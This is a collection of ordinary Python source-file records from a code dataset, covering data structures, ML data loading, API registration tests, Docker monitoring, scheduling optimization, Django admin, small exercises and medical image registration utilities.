+{"seq_id":"385154976","text":"#!/usr/bin/env python\n\n# -*- coding:utf-8 -*-\n\n#An Algorithm for Matching Delimiters\n#page 239\nimport stack2\n\ndef is_matched(expr):\n\t\"\"\"\n\t\treturn True if all delimiters are properly matched;\n\t\"\"\"\n\n\tlefty = '({['\n\trighty = ')}]'\n\n\tS = stack2.ArrayStack()\n\n\tprint (type(S))\n\n\tfor c in expr:\n\t\tif c in lefty:\n\t\t\tS.push(c)\n\t\telif c in righty:\n\t\t\tif S.is_empty():\n\t\t\t\treturn False\n\t\t\tif righty.index(c) != lefty.index(S.pop()):\n\t\t\t\treturn False\n\t# only after scanning the whole expression can we decide\n\treturn S.is_empty()\n\n\ndef is_matched_html(raw):\n\tS = stack2.ArrayStack()\n\tj = raw.find('<')\n\twhile j != -1:\n\t\tk = raw.find('>', j+1)\n\t\tif k == -1:\n\t\t\treturn False\n\t\ttag = raw[j+1:k]\n\t\tif not tag.startswith('/'):\n\t\t\tS.push(tag)\n\t\telse:\n\t\t\tif S.is_empty():\n\t\t\t\treturn False\n\t\t\tif tag[1:] != S.pop():\n\t\t\t\treturn False\n\t\tj = raw.find('<', k + 1)\n\n\treturn S.is_empty()\n","sub_path":"dataStructor/stack_matched.py","file_name":"stack_matched.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"388564691","text":"from torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nfrom config import MNIST_PATH, BATCH_SIZE_TRAIN, BATCH_SIZE_TEST, MNIST_INFO\n\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((MNIST_INFO['MEAN'],), (MNIST_INFO['STD'],))\n])\n\n\ndef load_data(train=True, transforms=transforms) -> DataLoader:\n data_set = datasets.MNIST(MNIST_PATH, download=True, train=train, transform=transform)\n batch_size = BATCH_SIZE_TRAIN if train else BATCH_SIZE_TEST\n data_loader = DataLoader(data_set, batch_size=batch_size, shuffle=True)\n\n return data_loader\n","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"75286059","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/10/12 9:13\n@Author : liufubin\n@FileName: test_registry_api.py\n@description: registration API requests for the China Resources project\n\"\"\"\nimport unittest\nimport random\nimport time\nfrom public_method.request_method import RequestMethod\nfrom request_date.china_resource.registry_request import RegistryRequestDate\nfrom public_method.connect_redis import ConnectRedis\n\n\nclass TestRegistryRequest(unittest.TestCase):\n isskip = ['yes']\n\n def setUp(self) -> None:\n pass\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_didnot_apply_code(self):\n \"\"\"Registration without requesting a verification code: the get-code API is never called\"\"\"\n response = RequestMethod.http_post_method(requesturl=RegistryRequestDate.registry_request_url,\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n response = response.json()\n self.assertTrue(response['data']['message'] == '未申请验证码' and response['data']['code'] == 407, '没有申请验证码未报未申请验证码的错')\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_normal_registry(self):\n \"\"\"Normal registration: first call the get-code API for the code and cookie, then call the registration API\"\"\"\n registry_cellphone = random.randint(10000000, 99999999) # random last eight digits of the phone number\n registry_time = time.time() # current timestamp\n get_session, getresponse = RequestMethod.request_get_method( # call the get-code API, which writes the code into redis\n 'http://mom-test.simuwang.com/momapi/v1/system/userMgt/'\n 'getSmsCode?mobile=130{}&registerOrNot=true&'\n 't={}'\n .format(registry_cellphone, registry_time))\n cookie_value = 'JSESSIONID={}'.format(get_session['JSESSIONID'])\n registry_code = ConnectRedis().redis_get('\"USER_CELLPHOME_130{}\"'.format(registry_cellphone)) # read the code from redis\n # registry_code = int(re.sub(\"\\\"\", '', registry_code))\n print(registry_code)\n registry_code = registry_code.replace(\"\\\"\", \"\") # redis stores the value with double quotes, strip them\n RegistryRequestDate.registry_request_body['code'] = registry_code\n RegistryRequestDate.registry_request_body['cellphone'] = '130{}'.format(registry_cellphone)\n RegistryRequestDate.registry_request_header['Cookie'] = cookie_value # the request header must carry the cookie\n response = RequestMethod.http_post_method(requesturl=RegistryRequestDate.registry_request_url, # call the registration API\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n del RegistryRequestDate.registry_request_header['Cookie']\n response = response.json()\n self.assertTrue(response['data']['result'] == 'success' and response['data']['code'] == 200, '注册失败,该用例应该注册成功')\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_already_registry_cellphone(self):\n \"\"\"Phone number differs from the one that requested the code: get the code and cookie first, then call the registration API\"\"\"\n registry_cellphone = random.randint(10000000, 99999999) # random last eight digits of the phone number\n registry_time = time.time() # current timestamp\n get_session, getresponse = RequestMethod().request_get_method('http://192.168.1.37:8080' # call the get-code API\n '/momapi/v1/system/userMgt/getSmsCode?'\n 'mobile=130{}&registerOrNot=true&t={}'\n .format(registry_cellphone, registry_time))\n print(get_session)\n cookie_value = 'JSESSIONID={}'.format(get_session['JSESSIONID'])\n registry_code = ConnectRedis().redis_get('USER_CELLPHOME_130{}'.format(registry_cellphone)) # read the code from redis\n # registry_code = int(re.sub(\"\\\"\", '', registry_code))\n registry_code = registry_code.replace(\"\\\"\", \"\") # redis stores the value with double quotes, strip them\n RegistryRequestDate.registry_request_body['code'] = registry_code\n RegistryRequestDate.registry_request_body['cellphone'] = '13055866828'\n RegistryRequestDate.registry_request_header['Cookie'] = cookie_value # the request header must carry the cookie\n response = RequestMethod().http_post_method(requesturl=RegistryRequestDate.registry_request_url, # call the registration API\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n del RegistryRequestDate.registry_request_header['Cookie'] # remove the cookie from the header to avoid affecting other test cases\n response = response.json()\n self.assertTrue(response['data']['message'] == '手机号与申请验证码的手机号不一致'\n and response['data']['code'] == 407, '手机号不一致没有报不一致错误')\n\n # def test_delete_user(self):\n # \"\"\"Delete the users created by the automation run: find them, extract the userid from the returned tuples, and call the delete API one by one\"\"\"\n # sql = \"SELECT \tuserid FROM rz_combination_master.cm_user WHERE username LIKE '姓名%'\"\n # sql_result = ConnectMysql().fetchall(sql)\n # print(type(sql_result))\n # for i in sql_result:\n # response = RequestMethod.request_delete_method('http://192.168.1.37:8080/momapi/v1/'\n # 'system/userMgt/delUserByUserId?userId={}'.format(i[0]))\n # print(response)\n\n\nif __name__ == '__main__':\n # registry_response = RegistryRequest()\n TestRegistryRequest().test_normal_registry()\n","sub_path":"test_case/custom_system/china_resource/test_registry_api.py","file_name":"test_registry_api.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"200146699","text":"# -*- coding: UTF-8 -*-\nimport docker\n\nclient = 
docker.from_env()\n\n\nclass ContainerStatus(object):\n exited = 'exited'\n running = 'running'\n restarting = 'restarting'\n paused = 'paused'\n\n\ndef print_container(container):\n print(f'{container.short_id} {container.name} {container.status}')\n\n\ndef report_all_containers():\n for c in client.containers.list(all=True):\n print_container(c)\n\n\ndef run():\n for event in client.events(decode=True):\n if event.get('Type') == 'container':\n name = event.get('from')\n container = client.containers.get(name)\n if container is None:\n print(f'container \"{name}\" not found')\n continue\n\n if container.status == ContainerStatus.exited:\n container.start()\n container.reload()\n","sub_path":"moni/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"3499325","text":"from gekko import GEKKO\nimport networkx as nx\nimport random\nimport plotly.figure_factory as ff\nfrom fractions import Fraction as frac\n\n\ndef init_solver(mrt, G, num_tasks, w, order, task_scaling=False):\n \"\"\"\n prepares the optimization equation by adding the necessary constraints\n :param mrt: Boolean variable that is True if objective is to optimize for \n MRT + E, False if objective is to optimize Makespan + E.\n :param G: DAG to schedule\n :param num_tasks: total number of tasks\n :param order: ordering\n :param task_scaling: Boolean whether to scale tasks or not\n :return: m, s, c\n \"\"\"\n m = GEKKO()\n\n # Use IPOPT solver (default)\n m.options.SOLVER = 3\n\n # Change to parallel linear solver\n m.solver_options = ['linear_solver ma97']\n\n # create array\n s = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n s[i].value = 2.0\n s[i].lower = 0\n\n # define completion time of each task\n c = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n c[i].value = 0\n c[i].lower = 0\n\n # 1b\n # task's completion time must be later than the time to run task itself\n for i in range(num_tasks):\n m.Equation(w[i] / s[i] <= c[i])\n\n # 1c\n # task must start later than all ancestors\n for i in range(num_tasks):\n for j in nx.algorithms.ancestors(G, i):\n m.Equation(c[j] + (w[i] / s[i]) <= c[i])\n\n\n # task must start later than previous task on machine\n resource_constraints = get_resource_constraints(order)\n for constraint in resource_constraints:\n task = constraint[1]\n prev = constraint[0]\n m.Equation(c[prev] + (w[task] / s[task]) <= c[task])\n\n # all tasks on single machine must run at same speed\n if not task_scaling:\n for machine in order:\n for i in range(len(machine)):\n if i != len(machine)-1:\n m.Equation(s[machine[i]] == s[machine[i+1]])\n\n P = m.Var(value=5, lb=0)\n m.Equation(m.sum([w[j] * s[j] for j in range(num_tasks)]) == P)\n\n M = m.Var(value=5, lb=0)\n MRT = m.Var(value=5, lb=0)\n\n\n for j in range(num_tasks):\n m.Equation(c[j] <= M)\n\n for lst in order:\n m.Equation(sum([w[i] / s[i] for i in lst]) <= M)\n\n # define MRT\n m.Equation(m.sum([c[j] for j in range(num_tasks)]) == MRT)\n\n if mrt: \n m.Obj(MRT + P)\n\n else:\n\n m.Obj(P + M) # Objective\n\n \n return m, s, c\n\n\ndef init_opt_solver(mrt, G, num_tasks, num_machines, w):\n \"\"\"\n prepares the optimization equation by adding the necessary constraints\n :param mrt: Boolean variable that is True if objective is to optimize for \n MRT + E, False if objective is to optimize Makespan + E.\n :param G: DAG to schedule\n :param num_tasks: total number of tasks\n :param w: weights\n :return: m, s, c\n 
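Editor's note: in the watcher record above, `client.containers.get(...)` never returns `None`; the docker SDK raises `docker.errors.NotFound` instead, so the `is None` guard is dead code. Also, a container event's `from` field is the image name, while its `id` field is the container id, which is the unambiguous lookup key. A sketch with both points addressed:

```python
import docker
from docker.errors import NotFound

client = docker.from_env()

def run():
    for event in client.events(decode=True):
        if event.get('Type') != 'container':
            continue
        try:
            # 'from' is the image, not the container; look up by container id
            container = client.containers.get(event['id'])
        except NotFound:                     # .get() raises instead of returning None
            continue
        if container.status == 'exited':     # same check as ContainerStatus.exited above
            container.start()
            container.reload()
```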
\"\"\"\n m = GEKKO()\n\n # Use IPOPT solver (default)\n m.options.SOLVER = 3\n\n # Change to parallel linear solver\n m.solver_options = ['minlp_max_iter_with_int_sol 10000']\n\n # create array\n s = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n s[i].value = 2.0\n s[i].lower = 0\n\n # define completion time of each task\n c = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n c[i].value = 0\n c[i].lower = 0\n\n x = [[m.sos1([0,1]) for j in range(num_tasks)] for i in range(num_machines)]\n\n #Yu's constraints that you can uncomment\n p = [[m.sos1([0,1]) for j in range(num_tasks)] for j_prime in range(num_tasks)] \n b = [[m.sos1([0,1]) for j in range(num_tasks)] for j_prime in range(num_tasks)] \n\n # 1a\n # each task will be assigned to exactly one machine\n for j in range(num_tasks):\n m.Equation(m.sum([x[i][j] for i in range(num_machines)]) == 1)\n\n # 1b\n # task's completion time must be later than the time to run task itself\n for j in range(num_tasks):\n m.Equation( w[j] / s[j] <= c[j])\n\n # 1c\n # task must start later than all ancestors\n for j in range(num_tasks):\n for k in nx.algorithms.ancestors(G, j):\n m.Equation(c[k] + (w[j] / s[j]) <= c[j])\n\n M = m.Var(value=5, lb=0)\n P = m.Var(value=5, lb=0)\n MRT = m.Var(value=5, lb=0)\n\n # Yu's constraints that you can uncomment\n for j_prime in range(num_tasks):\n for j in range(num_tasks):\n if j != j_prime:\n m.Equation(m.sum([x[i][j] * x[i][j_prime] for i in range(num_machines)]) == p[j][j_prime])\n\n for j_prime in range(num_tasks):\n for j in range(num_tasks):\n if j != j_prime:\n m.Equation(p[j][j_prime] * (c[j] - c[j_prime] + (w[j_prime] / s[j_prime])) <= b[j][j_prime] * (\n M - c[j_prime] + (w[j_prime] / s[j_prime])))\n m.Equation(b[j][j_prime] * (c[j_prime] + (w[j]/s[j])) <= p[j][j_prime] * c[j])\n m.Equation(b[j][j_prime] <= p[j][j_prime])\n b[j][j_prime] = m.if3(b[j_prime][j] - 1, 1, 0)\n\n\n # Total load assigned to each machine should not be greater than the makespan\n for i in range(num_machines):\n m.Equation(m.sum([w[j] * x[i][j] / s[j] for j in range(num_tasks)]) <= M)\n\n # 1e (define M in objective function)\n for j in range(num_tasks):\n m.Equation(c[j] <= M)\n\n # define P in objective function\n m.Equation(m.sum([w[j] * s[j] for j in range(num_tasks)]) == P)\n\n # define MRT\n m.Equation(m.sum([c[j] for j in range(num_tasks)]) == MRT)\n\n if mrt: \n m.Obj(MRT + P)\n\n else:\n\n m.Obj(P + M) # Objective\n \n\n # Old Objective\n # m.Obj(sum([int(v[i]) / s[i] + s[i] for i in range(len(v))]))\n\n # objective for mean completion time\n \n return x, m, s, c\n\ndef get_resource_constraints(order):\n \"\"\"\n gets resource constraints for a given ordering\n :param order:\n :return: resource constraints\n \"\"\"\n resource_constraints = []\n for machine in order:\n for i in range(len(machine)):\n if i != len(machine) -1:\n task = machine[i]\n next_task = machine[i+1]\n resource_constraints.append([task, next_task])\n\n return resource_constraints\n\n\ndef solver_results(x, s, m, c, w, order=False, verbose=True):\n \"\"\"\n solves the optimization equation\n :param s: speeds\n :param m: gekko model\n :param c: completion times\n :param verbose: boolean to print or not\n :param order: optional order to print or not\n :return: task_process_time, ending times, intervals, speeds, objective value\n \"\"\"\n\n #m.Obj(O) # Objective\n\n try:\n m.options.IMODE = 3 # Steady state optimization\n m.solve(disp=verbose) # Solve\n\n except:\n print(\"Did not work\")\n if order!=False:\n print(\"Order is \", order)\n 
return order, [-1]*len(s), [-1]*len(s), [-1,-1]*len(s),[-1]*len(s), 10000000\n\n task_process_time = [frac(w[i] / frac(s[i].value[0])) for i in range(len(s))]\n ending_time = [frac(c[i].value[0]) for i in range(len(c))]\n intervals = [[end - process_time, end] for (process_time, end) in zip(task_process_time, ending_time)]\n speeds = [frac(s[i].value[0]) for i in range(len(s))]\n\n task_process_time = [float(process_time.__round__(5)) for process_time in task_process_time]\n ending_time = [float(end_time.__round__(5)) for end_time in ending_time]\n intervals = [[float(interval[0].__round__(5)), float(interval[1].__round__(5))] for interval in intervals]\n speeds = [float(speed.__round__(5)) for speed in speeds]\n \n if verbose:\n print('Results')\n for i in range(len(s)):\n print(str(i) + \" Speed: \" + str(s[i].value) + \" Ending Time: \" + str(c[i].value) + \" Interval: \" +\n str(intervals[i]) + \" Task process time: \" + str(task_process_time[i]))\n print('Objective: ' + str(m.options.objfcnval))\n\n\n if x != None: \n order = create_order(x, c)\n else:\n order = None\n\n return order, task_process_time, ending_time, intervals, speeds, float(frac(m.options.objfcnval).__round__(5))\n\n\n\n\n\n\n\ndef create_order(x, c):\n\n order = []\n \n num_machines = len(x)\n num_tasks = len(c)\n\n for i in range(num_machines):\n machine_unordered = []\n for j in range(num_tasks):\n if int(round(x[i][j].value[0])) == 1:\n machine_unordered.append((c[j].value[0], j))\n\n machine_sorted = sorted(machine_unordered)\n machine_order = []\n \n for k in range(len(machine_sorted)):\n \n machine_order.append(machine_sorted[k][1])\n order.append(machine_order)\n \n\n return order\n\ndef get_objective(ending_times, speeds):\n \"\"\"\n Calculates objective given a schedule\n :param ending_times: completion times for a task\n :param speeds: speeds of tasks running\n :return:\n \"\"\"\n return sum([ending_times[i] + speeds[i] for i in range(len(speeds))])\n\n\ndef get_machines(order, num_tasks):\n \"\"\"\n returns list of task machine mappings\n :param order: order of tasks across machines\n :param num_tasks: number of total tasks\n :return:\n \"\"\"\n machines = num_tasks * [-1]\n for machine_index in range(len(order)):\n for task in order[machine_index]:\n machines[task] = machine_index\n return machines\n\n\ndef make_task_metadata(order, num_tasks, intervals):\n \"\"\"\n makes data ready to be plotted on a pretty gantt chart\n :param order: machine task ordering\n :param num_tasks: total number of tasks for the dag\n :param intervals: start end time 2d list\n :return: a dict of metadata with subdict for fields\n \"\"\"\n task_metadata = {}\n machines = get_machines(order, num_tasks)\n for task_name in range(len(intervals)):\n\n task_metadata[task_name] = {'start': intervals[task_name][0], 'end': intervals[task_name][1],\n 'task': task_name, 'machine': machines[task_name]}\n return task_metadata\n\n\ndef plot_gantt(task_metadata, objective_value, color_palette):\n \"\"\"\n plots the task_speed_scaling gantt chart given the metadata\n :param task_metadata: metadata\n :param objective_value: value of objective for current value\n :param color_palette: rgb tuples for colors to use\n :return:\n \"\"\"\n df = []\n colors = {}\n # print(task_metadata)\n for task_key in task_metadata:\n task = task_metadata[task_key]\n df.append(dict(Task=str(\"Machine \" + str(task['machine'])), Start=task['start'], Finish=task['end'], Machine=task['task']))\n if task['task'] < len(color_palette):\n color = 
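Editor's note: the failure branch of `solver_results` above returns `[-1,-1]*len(s)` for the intervals, a flat list rather than the list of `[start, end]` pairs the success path produces, so downstream unpacking differs between the two paths. The `create_order` reconstruction, by contrast, can be exercised without a solver; a pure-Python illustration of what it does (group tasks by the machine whose assignment entry rounds to 1, then sort each group by completion time):

```python
def order_from_assignment(x, c):
    """x[i][j] ~ 1 if task j runs on machine i; c[j] is task j's completion time."""
    return [sorted((j for j, used in enumerate(row) if round(used) == 1),
                   key=lambda j: c[j])
            for row in x]

assert order_from_assignment([[1, 0, 1], [0, 1, 0]], [5.0, 1.0, 2.0]) == [[2, 0], [1]]
```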
color_palette[task['task']]\n else:\n color = (random.uniform(0, 1), random.uniform(0, 1), random.uniform(0, 1))\n color_palette.append(color)\n colors[task['task']] = color\n title = \"Speed Scaling Gantt Chart for Objective: \" + str(objective_value)\n fig = ff.create_gantt(df, colors=colors, index_col='Machine', show_colorbar=True, group_tasks=True, showgrid_x=True, showgrid_y=True, title=title)\n fig.update_xaxes(type='linear')\n fig.show(\"notebook\")\n return color_palette\n\n\nif __name__ == \"__main__\":\n dag = nx.DiGraph()\n dag.add_nodes_from(range(9))\n dag.add_edges_from([(0, 2), (2, 3), (2, 4), (3, 5), (4, 5), (5, 6), (6, 7), (7, 8)])\n\n # Sample test\n order = [[0, 2, 3, 5, 6, 7, 8], [4, 1]]\n v = [9, 1, 8, 5, 2, 4, 3, 2, 1]\n m, s, c = init_solver(dag, v, order)\n task_processing_time, ending_time, intervals, obj = solver_results(s, m, c)\n task_metadata = make_task_metadata(order, 9, intervals)\n plot_gantt(task_metadata, obj)\n print(\"finished test hopefully it worked\")","sub_path":"conjecture/optimization_functions.py","file_name":"optimization_functions.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"450643123","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext_lazy as _\n\nfrom import_export.admin import ImportExportModelAdmin\nfrom import_export.fields import Field\nfrom import_export import resources\n\nfrom fleet_management.models import Car, Drive, User, Project, Refuel\n\n\nclass CountryFilter(admin.SimpleListFilter):\n title = _(\"Country\")\n parameter_name = \"country\"\n\n def lookups(self, request, model_admin):\n objects = model_admin.model.objects.distinct(self.parameter_name)\n countries = [(o.country.code, o.country.name) for o in objects]\n countries = sorted(countries, key=lambda c: c[1]) # sort by name, A-Z\n return [(\"ALL\", _(\"Global\"))] + countries\n\n def queryset(self, request, queryset):\n value = self.value()\n\n # \"ALL\" is special value used for showing global users (with empty country)\n if value == \"ALL\":\n value = \"\"\n\n if value is not None:\n return queryset.filter(**{self.parameter_name: value})\n\n return queryset\n\n\nclass DriveResource(resources.ModelResource):\n diff_mileage = Field(attribute=\"diff_mileage\")\n fuel_consumption = Field(attribute=\"fuel_consumption\")\n\n class Meta:\n model = Drive\n fields = (\n \"id\",\n \"date\",\n \"country\",\n \"is_verified\",\n \"project__title\",\n \"description\",\n \"start_mileage\",\n \"end_mileage\",\n \"diff_mileage\",\n \"start_location\",\n \"end_location\",\n \"driver\",\n \"passenger\",\n \"car__plates\",\n \"fuel_consumption\",\n )\n export_order = fields\n\n def dehydrate_country(self, drive):\n return str(drive.country.name)\n\n def dehydrate_driver(self, drive):\n return str(drive.driver)\n\n def dehydrate_passenger(self, drive):\n return str(drive.passenger)\n\n\n@admin.register(Drive)\nclass DriveAdmin(ImportExportModelAdmin):\n resource_class = DriveResource\n list_filter = (CountryFilter,)\n list_display = (\n \"date\",\n \"start_location\",\n \"end_location\",\n \"driver\",\n \"passenger\",\n \"country\",\n \"is_verified\",\n )\n\n\n@admin.register(Car)\nclass CarAdmin(admin.ModelAdmin):\n list_filter = (CountryFilter,)\n list_display = (\"plates\", \"description\", \"fuel_consumption\", \"country\")\n\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n 
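Editor's note: the `__main__` block that closes the optimization record no longer matches the signatures defined above it: `init_solver` now takes `(mrt, G, num_tasks, w, order, ...)`, `solver_results` takes `(x, s, m, c, w, ...)`, and `plot_gantt` requires a `color_palette`. A call sequence consistent with those signatures (same `dag`, `v`, `order` as in the record; `mrt=False` optimizes makespan plus energy):

```python
# Corrected driver fragment; all names come from the record's own __main__.
m, s, c = init_solver(False, dag, 9, v, order)
_, task_times, ends, intervals, speeds, obj = solver_results(None, s, m, c, v)
task_metadata = make_task_metadata(order, 9, intervals)
plot_gantt(task_metadata, obj, color_palette=[])
```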
list_filter = (CountryFilter,)\n list_display = (\"title\", \"country\")\n\n\n@admin.register(User)\nclass CustomUserAdmin(UserAdmin):\n list_filter = (\"groups\", CountryFilter)\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"country\",\n \"is_staff\",\n \"last_seen\",\n )\n\n fieldsets = (\n (None, {\"fields\": (\"username\", \"password\")}),\n (\n _(\"Personal info\"),\n {\"fields\": (\"first_name\", \"last_name\", \"email\", \"country\")},\n ),\n (\n _(\"Permissions\"),\n {\n \"fields\": (\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n (_(\"Important dates\"), {\"fields\": (\"last_seen\", \"last_login\", \"date_joined\")}),\n )\n\n\n@admin.register(Refuel)\nclass RefuelAdmin(admin.ModelAdmin):\n list_filter = (\n \"driver\",\n \"car\",\n )\n list_display = (\n \"driver\",\n \"car\",\n \"date\",\n \"current_mileage\",\n \"refueled_liters\",\n \"price_per_liter\",\n \"total_cost\",\n )\n","sub_path":"backend/fleet_management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"277387585","text":"# -*- coding: utf-8 -*-\n\n# (цикл while)\n\n# даны целые положительные числа a и b (a > b)\n# с a на b, с помощью цикла while,\n# __НЕ__ используя стандартную операцию целочисленного деления (// и %)\n# Формат вывода:\n# Целочисленное деление ХХХ на YYY дает ZZZ\n\na, b = 142523, 4435\n\nwhile a > b:\n result = int(a / b)\n print('Целочисленное деление', a, 'на', b, 'дает', result)\n break\nelse:\n print('некорректный ввод')","sub_path":"lesson_003/03_division.py","file_name":"03_division.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"313217448","text":"import argparse\nimport sentencepiece as spm\n\nif __name__ == \"__main__\":\n\t\n\tparser = argparse.ArgumentParser(description='learn bpe like a pro')\n\tparser.add_argument('--input', '-i', type=str, help='input file')\n\tparser.add_argument('--model', '-m', type=str, help='Model prefix')\n\tparser.add_argument('--vocab_size', '-v', type=int, help='vocab size')\n\targs = parser.parse_args()\n\n\tspm.SentencePieceTrainer.Train(f\"--model_type=bpe --input={args.input} --model_prefix={args.model} --vocab_size={args.vocab_size}\")\n\t\n","sub_path":"utils/bpe-learn.py","file_name":"bpe-learn.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"645406358","text":"def move(no, x, y):\r\n \"\"\"원반을 no개를 X 기둥에서 y 기둥으로 옮김\"\"\"\r\n if no > 1:\r\n move(no - 1, x, 6 - x - y)\r\n\r\n print(f'원반 [{no}]을(를) {x}기둥에서 {y}기둥으로 옮깁니다.')\r\n\r\n if no > 1:\r\n move(no - 1, 6 - x - y, y)\r\n\r\nprint('하노이의 탑을 구현하는 프로그램입니다.')\r\nn = int(input('원반의 개수를 입력하세요: '))\r\n\r\nmove(n, 1, 3)\r\nprint()","sub_path":"hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"457043272","text":"import sigpy as sp\nimport numpy as np\nimport os, glob\nimport nibabel \nfrom sigpy.linop import Linop\nfrom sigpy import backend\nimport scipy.ndimage as ndimage\nfrom scipy.io import loadmat\nfrom scipy import linalg\nimport ants\n\n__all__ = ['interp_op', 'interp', 'ANTsReg', 'ANTsAff', 'interp_affine_op']\n\ndef M_scale2(M, oshape, scale = 1):\n Mscale = 
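Editor's note: the Russian-commented division record above promises integer division without `//` or `%`, yet still computes `int(a / b)` and exits after one pass through the loop. Repeated subtraction actually honors the constraint:

```python
a, b = 142523, 4435          # requires a > b > 0, as the exercise states
quotient, remainder = 0, a
while remainder >= b:
    remainder -= b
    quotient += 1
print('Integer division of', a, 'by', b, 'gives', quotient)   # 32
```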
[oshape[i]/M.shape[i+1] for i in range(M.shape[0])]\n Mo = np.zeros((M.shape[0],)+oshape)\n for i in range(M.shape[0]):\n M[i] = M[i]*(Mscale[i]*scale)\n Mo[i] = ndimage.zoom(M[i],zoom=tuple(Mscale),order=1)\n\n return Mo\n\ndef M_scale(M, oshape, scale = 1):\n Mscale = [oshape[i]/M.shape[i] for i in range(M.shape[-1])]\n Mo = np.zeros(oshape+(M.shape[-1],))\n for i in range(M.shape[-1]):\n M[...,i] = M[...,i]*(Mscale[i]*scale)\n Mo[...,i] = ndimage.zoom(M[...,i],zoom=tuple(Mscale),order=2)\n\n return Mo\n\ndef ANTsAff(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n # transfer to nifti\n Ifnft = nibabel.Nifti1Image(If,affine=np.diag(vox_res+[1]))\n Imnft = nibabel.Nifti1Image(Im,affine=np.diag(vox_res+[1]))\n \n nibabel.save(Ifnft,'./tmp_If.nii')\n nibabel.save(Imnft,'./tmp_Im.nii')\n \n reg_level_s = 'x'.join([str(t) for t in reg_level])\n gauss_filt_s = 'x'.join([str(t) for t in gauss_filt])\n \n ants_cmd = 'antsRegistration -d 3 -m MI[ {}, {}, 1, 50 ] -t Rigid[0.1] \\\n -c [ 100x100x40, 1e-6, 10 ] -s {}vox -f {} --winsorize-image-intensities [0.1,1]\\\n -l 1 -u 1 -z 1 -v -o tmp_'.format('tmp_Im.nii','tmp_If.nii',gauss_filt_s,reg_level_s)\n os.system(ants_cmd)\n x = loadmat('./tmp_0GenericAffine.mat')\n T = x['AffineTransform_double_3_3'].reshape([4,3])\n\n # ANTs orientation\n M_rot = [[1,-1,1],[-1,1,1],[1,1,1],[1,1,-1]]\n T = T*M_rot\n T[3,...] = T[3,...].dot(linalg.inv(T[:3]))\n \n return T\n\nclass interp_affine_op(Linop):\n def __init__(self, ishape, T):\n assert list(T.shape) == [4,3],\"Tmatrix Dimension mismatch!\"\n oshape = ishape\n self.T = T\n super().__init__(oshape, ishape)\n\n def _apply(self, input):\n return interp_affine(input,self.T)\n\n def _adjoint_linop(self):\n T = self._aff_inversion(self.T)\n\n return interp_affine_op(self.ishape, T)\n \n def _aff_inversion(self,T):\n T_inv = np.zeros_like(T)\n T_inv[:3,:] = np.linalg.inv(T[:3,:])\n T_inv[3,:] = -T[3,:].dot(T[:3,:].transpose())\n return T_inv\n \ndef interp_affine(I, T, aff_order = 1):\n # T should be [4,3], [:3,3] rotation, [3,:] shift\n shift_before_rot = T[3,:]\n shift_after_rot=shift_before_rot.dot(T[:3,:].transpose())\n shift_after_rot = -T[3,:]\n AT = lambda x: ndimage.affine_transform(x,T[:3,:],offset=-shift_after_rot,order=aff_order)\n if np.iscomplexobj(I) is True:\n I_aff = AT(np.real(I)) + 1j * AT(np.imag(I))\n else:\n I_aff = AT(I)\n \n return I_aff\n \ndef ANTsReg4(Is,ref = 0):\n M_fields = []\n iM_fields = []\n nphase = len(Is)\n for i in range(nphase):\n M_field, iM_field = ANTsReg(np.abs(Is[2]), np.abs(Is[i]))\n\n M_fields.append(M_field)\n iM_fields.append(iM_field)\n # change\n np.save('./M_field.npy',np.asarray(M_fields))\n np.save('./iM_field.npy',np.asarray(iM_fields))\n\ndef ANTsReg(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n\n fixed = ants.from_numpy(Im)\n moving = ants.from_numpy(If)\n \n tmp_dir = 'tmp{}_'.format(np.random.randint(0,1e4))\n \n reg_dict = ants.registration(fixed, moving, type_of_transform='SyNOnly', initial_transform=\"identity\",\\\n syn_metric='demons', syn_sampling=4, \\\n grad_step=0.1, flow_sigma=5, total_sigma=3,\\\n reg_iterations=(100,100,40,20,10), \\\n verbose=False, outprefix=tmp_dir, \\\n w='[0.1,1]', write_composite_transform=False)\n # -s -f -l not 